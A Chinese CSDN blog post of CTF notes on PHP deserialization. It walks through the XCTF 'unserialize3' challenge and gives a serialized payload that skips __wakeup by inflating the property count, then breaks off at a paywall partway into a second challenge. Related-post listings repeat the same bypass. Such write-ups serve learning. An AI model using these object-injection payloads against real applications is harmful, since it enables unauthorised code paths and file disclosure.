php反序列化做题笔记

最新推荐文章于 2025-01-27 19:43:15 发布
最新推荐文章于 2025-01-27 19:43:15 发布
阅读量451 收藏 17
点赞数 10
文章标签: php 笔记 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/amamamasasas/article/details/145212190
版权

unserialize3

class xctf{ 
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

首先观察代码。有一个—wakeup()魔术方法。?code= 所以序列化后的参数需要从这里输入。

<?php
class xctf{ 
    public $flag = '111';
    }
$b=new xctf();
echo serialize($b);
?>

借用代码实现xctf的序列化:O:4:"xctf":1:{s:4:"flag";s:3:"111";}

但反序列化执行前会触发_wakeup魔术方法,干扰代码的执行,所以我们需要绕过__wakeup魔术方法。需要将对象属性个数的值大与本身属性的个数,比如O:4:"xctf":2:{s:4:"flag";s:3:"111";}

然后?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}就可以得到flag。

Web_php_unserialize

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function _
最低0.47元/天 解锁文章
amamamasasas
关注
php序列化绕过wakeup,PHP反序列化漏洞#XCTF题 : unserialize3#绕过wakeup()函数
weixin_42544461的博客
03-22 545
1.代码与结果代码如下:class xctf{public $flag='111';public function __wakeup(){exit('bad requests');}}$content = new xctf();echo serialize($content);?>结果如下:O:4:"xctf":1:{s:4:"flag";s:3:"111";}实验截图:2.相关姿势点2.1...
ctf_show笔记篇(web入门---反序列化
whale_waves的博客
03-19 2178
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
学习笔记 | PHP反序列化漏洞
m0_57133419的博客
08-11 398
其中wakeup()函数漏洞原理是类对象属性个数超过实际个数,也就是其中的类名称后面跟的数字就是属性,修改为2时,不执行wakeup函数。就不会输出bad request,如果用没修改过的序列化语句就会输出bad request。看到wakeup函数,先构造序列化语句输出。攻防世界unserialize3。
ctf每日练习-第一天
想变得强大,虽然现在还弱不禁风
08-28 585
unserialize3(来自xctf web进阶区) unserialize3题目链接 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 原理: PHP反序列化漏洞:执行unserialize()时,先会调用__wakeup()。 当序列化字符串中属性值个数大于属性个数,就会导致反序列化异常,从而跳过__wakeup()。 本题_wakeup会执行exit(),所以要绕
xctf攻防世界 Web高手进阶区 unserialize3
l8947943的博客
07-24 9376
深度剖析PHP序列化和反序列化
PHP反序列化小做
qq_74020399的博客
05-18 254
绕过方法:在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行wakeup()函数,即当前函数中只有一个参数$flag,若传入的序列化字符串中的参数个数为2即可绕过。原理:_wakeup()函数若不绕过则会将马上就要反序列化的字串中file给你替换为index,这样就会导致页面回到当前页面。在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行wakeup()函数。wakeup():反序列化之前检查执行的函数,不论如何都会优先执行wakeup()方法。
什么是反序列化反序列化的过程,原理
kali_Ma的博客
12-16 2万+
本篇主要分析java序列化、反序列化的过程,原理, 并且通过简化版URLDNS做案例分析利用链原理。
带你了解Java的序列化(Serializable)与反序列化
m0_75232472的博客
04-21 1007
其实我投简历的时候,都不太敢投递阿里。因为在阿里一面前已经过了字节的三次面试,投阿里的简历一直没被捞,所以以为简历就挂了。对比我的面经和其他大佬的面经,自己真的是运气好。别人8成实力,我可能8成运气。所以对我而言,我要继续加倍努力,弥补自己技术上的不足,以及与科班大佬们基础上的差距。希望自己能继续保持学习的热情,继续努力走下去。
初识反序列化
最新发布
wyjcxyyy的博客
01-27 671
前两天听了一位学长讲了序列化与反序列化基础,讲的巨好,也是收获颇丰。然后又做了一道相关题目,记录一下。
Web前端之动态执行JavaScrip、微信小程序无法使用eval和Function的解决办法、字符串表达式、字符串运算、数学计算、parseFloat、Function、pop
优快云博客主页地址:https://mengjian.blog.youkuaiyun.com/
11-17 2130
Web前端之动态执行JavaScrip、微信小程序无法使用eval和Function的解决办法、字符串表达式、字符串运算、数学计算、parseFloat、Function、pop
反序列化之绕过wakeup()
dhgogogogogogo的博客
10-22 371
由于我这个新手不懂代码审计,问ai之后发现这是php代码,得知wakeup函数为魔术方法。当对象被反序列化时,就会调用wakeup函数,最后输出"bad repuests"。我们再将构造的payload(O:4:"xctf":2:{s:4:"flag";今天在写web题时遇到了一道这样的题目,扫描目录后,访问index.phps,找到了源代码。当序列化字符串中表示对象属性个数的值大于实际属性个数时,补充:这里我是第一次遇到payload的使用,
浅谈PHP反序列化漏洞
Atkx's Blog
10-18 571
PHP序列化 序列化是将变量转换为可保存或传输的字符串的过程。 先建一个Test对象,存入信息,然后new了一个实例$m的时候,将Test对象的一些信息给改变了。 如果还要用到这个实例,那就要把他序列化存起来,方便以后重用。 <?php class Test { public $id=1; public $name ="admin"; public $password="admins"; } $m=new Test(); $m->id=2; $m->name="root"
攻防世界-unserialize3_魔术函数,以及wakeup()函数的绕过
Fisher
05-15 1452
拿到题目得到一段代码: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 根据提提示是序列化,将xctf类进行序列化,之后如果执行__wakeup()则会跳出, 所以需要构造函数绕过 __wakeup() 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作 所以是将序列化的值反序列化之后执行,因此我们构造序列化的值 先将类进行序列化: <?php
PHP反序列化练习册
qwsn
11-19 2683
1、XCTF平台:https://adworld.xctf.org.cn/task 高阶:1.unserialize3 高阶:2.Web_php_unserialize 2、BUUCTF平台:https://buuoj.cn/challenges Web类:4.[安洵杯 2019]easy_serialize_php Web类:5.[ZJCTF 2019]NiZhuanSiWei Basic类:6.BUU CODE REVIEW 1 Web类:7.[网鼎杯 2020 青龙组]AreUSerialz Web类
攻防世界复习web进阶(3)
LGXJM20的博客
11-03 248
unserialize3解题思路 描述:无 思路:打开页面是一段代码,代码审计走起,最重要的是这一个函数function __wakeup(),配合题目unserialize想到PHP的序列化和反序列化 php反序列化:执行unserialize()时,先会调用__wakeup(),当序列化字符串中属性值个数大于属性个数,就会导致反序列化异常,从而跳过__wakeup()。 解题方法: <?php class xctf{ public $flag = '11
serialize()序列化引起的魔术方法__wakeup()函数漏洞—攻防世界-web萌新-unserialize3
Sea_Sand息禅
04-17 3530
知识点: 1、serialize()函数:用于序列化对象或数组,并返回一个字符串。序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。 2、unserialize()函数:用于将通过serialize()函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。 3、魔术方法:PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法。所以在定义类方法时,除...
__wakeup()绕过
v2ish1yan的博客
04-23 6783
__wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数 如xctf-unserialize3 只要序列化的中的成员数大于实际成员数,即可绕过 如 <?php class xctf { public $flag = '111'; public function __wakeup() { exit('bad requests'); } } $a=new xctf(); var_dump(seri
php魔法函数
Kr的博客
01-18 3237
发现在ctf中,关于PHP几大魔法函数的考点还是很多的,也是很基础的,也有很多的安全问题也是这些魔法函数造成的,简单记录一下关于魔法函数的理解以及在发现安全过程中遇到后怎么进行绕过。    1、__wakeup() __wakeup()是在反序列化操作中起作用的魔法函数,当unserialize的时候,会检查时候存在__wakeup()函数,如果存在的话,会优先调用__wakeup()函数。...
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值